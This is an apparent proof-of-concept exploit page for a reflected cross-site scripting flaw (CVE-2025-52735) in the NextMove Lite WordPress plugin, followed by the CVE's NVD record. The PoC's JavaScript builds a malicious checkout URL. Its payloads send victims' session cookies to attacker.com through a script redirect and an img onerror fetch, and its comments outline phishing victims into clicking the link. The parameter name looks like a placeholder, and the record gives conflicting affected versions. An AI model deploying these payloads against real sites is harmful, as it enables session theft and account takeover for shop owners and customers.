CVE-2025-52735

<!-- CVE-2025-52735 PoC - Reflected XSS in NextMove Lite --> <!-- Target: WordPress site with NextMove Lite plugin <= 2.24.0 --> <!-- Attack Vector: Malicious URL parameter injection --> <!DOCTYPE html> <html> <head> <title>CVE-2025-52735 PoC</title> </head> <body> <h2>CVE-2025-52735 - NextMove Lite Reflected XSS PoC</h2> <p>Malicious URL to deliver the XSS payload:</p> <!-- The actual malicious URL --> <code id="malicious-url"></code> <script> // Construct the malicious URL // Replace YOUR_TARGET_URL with the actual vulnerable site const targetBase = 'https://example.com'; const thankYouPath = '/checkout/order-received/'; // XSS payload - could be base64 encoded to bypass some filters const xssPayload = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>'; // Alternative payload - extracts sensitive data const altPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie+\'|\'+document.title))">'; const maliciousURL = targetBase + thankYouPath + '?nextmove_param=' + encodeURIComponent(xssPayload); document.getElementById('malicious-url').innerHTML = '<a href="' + maliciousURL + '" target="_blank">' + maliciousURL + '</a>'; // For demonstration - show what happens console.log('XSS Payload would be reflected in page output'); console.log('Payload: ' + xssPayload); // Simulated attack flow console.log('1. Attacker crafts malicious URL with XSS payload'); console.log('2. Victim clicks URL (via email/phishing/social engineering)'); console.log('3. Server reflects unsanitized input in response'); console.log('4. Victim browser executes injected JavaScript'); console.log('5. Attacker steals session cookies or sensitive data'); </script> </body> </html>

{"cve": {"id": "CVE-2025-52735", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:43.563", "lastModified": "2026-04-27T17:16:26.303", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite allows Reflected XSS.This issue affects NextMove Lite: from n/a through <= 2.24.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xlplugins:nextmove:*:*:*:*:lite:wordpress:*:*", "versionEndIncluding": "2.23.0", "matchCriteriaId": "52C95FD9-8310-4C5A-9C11-5077509D8938"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-nextmove-lite/vulnerability/wordpress-nextmove-lite-plugin-2-20-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}